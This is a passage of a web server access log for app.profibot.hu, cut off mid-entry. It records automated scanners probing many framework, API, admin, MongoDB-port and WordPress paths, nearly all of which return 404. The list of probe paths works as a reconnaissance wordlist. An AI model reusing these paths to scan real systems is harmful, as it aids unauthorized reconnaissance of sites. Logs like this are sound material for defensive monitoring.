404 - GET http app.profibot.hu "/contact" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/products" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/blog" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 185.177.72.22] [Length 526] [Gzip 1.92] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/_react/action/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/_react/data/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/actions/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/loaders/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/waku/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/_waku/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/*/[id]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/*/[slug]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/v1/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/v2/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/graphql" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/trpc/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/auth/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/login" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/register" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/signup" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/oauth/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/console/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/manage/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/posts/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/articles/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/pages/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/content/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/cart" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:33 +0000] - 404 404 - GET http app.profibot.hu "/checkout" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/orders/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/payment/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/workspaces/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/projects/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/teams/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/billing/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/integrations/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/cms/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/editor/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/media/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/publish/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/threads/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/messages/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/notifications/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/.netlify/functions/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/.vercel/functions/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/api/serverless/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/[locale]/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/en/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/fr/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/[tenant]/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/[workspace]/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/shop/[category]/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/blog/[year]/[month]/[slug]" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/:27017" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/:27018" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/:27019" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/:28017" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - - 404 - GET http app.profibot.hu "/.well-known/acme-challenge/*" [Client 185.177.72.22] [Length 122] [Gzip 1.35] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - - 404 - GET http app.profibot.hu "/.well-known/acme-challenge/" [Client 185.177.72.22] [Length 122] [Gzip 1.35] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/dnscfg.cgi" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/_layouts/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/_layouts/15/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/_api/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[23/Jan/2026:22:10:34 +0000] - 404 404 - GET http app.profibot.hu "/_vti_bin/*" [Client 185.177.72.22] [Length 22] [Gzip -] [Sent-to service_finder_api] "curl/8.7.1" "-" +[24/Jan/2026:03:56:24 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 45.94.31.58] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:24 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 45.94.31.58] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:24 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:24 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:24 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 45.94.31.58] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:03:56:25 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.58] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 142.248.80.192] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:03 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/website/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/news/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/2018/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/2019/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:04 +0000] - 404 404 - GET http app.profibot.hu "/shop/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/wp1/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/test/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/media/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/wp2/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/site/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/cms/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:04:27:05 +0000] - 404 404 - GET http app.profibot.hu "/sito/wp-includes/wlwmanifest.xml" [Client 142.248.80.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 200 200 - GET http app.profibot.hu "/" [Client 141.98.11.181] [Length 85] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/wp-includes/ID3/license.txt" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/feed/" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/xmlrpc.php?rsd" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/blog/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/web/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/wordpress/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-" +[24/Jan/2026:09:38:44 +0000] - 404 404 - GET http app.profibot.hu "/wp/wp-includes/wlwmanifest.xml" [Client 141.98.11.181] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 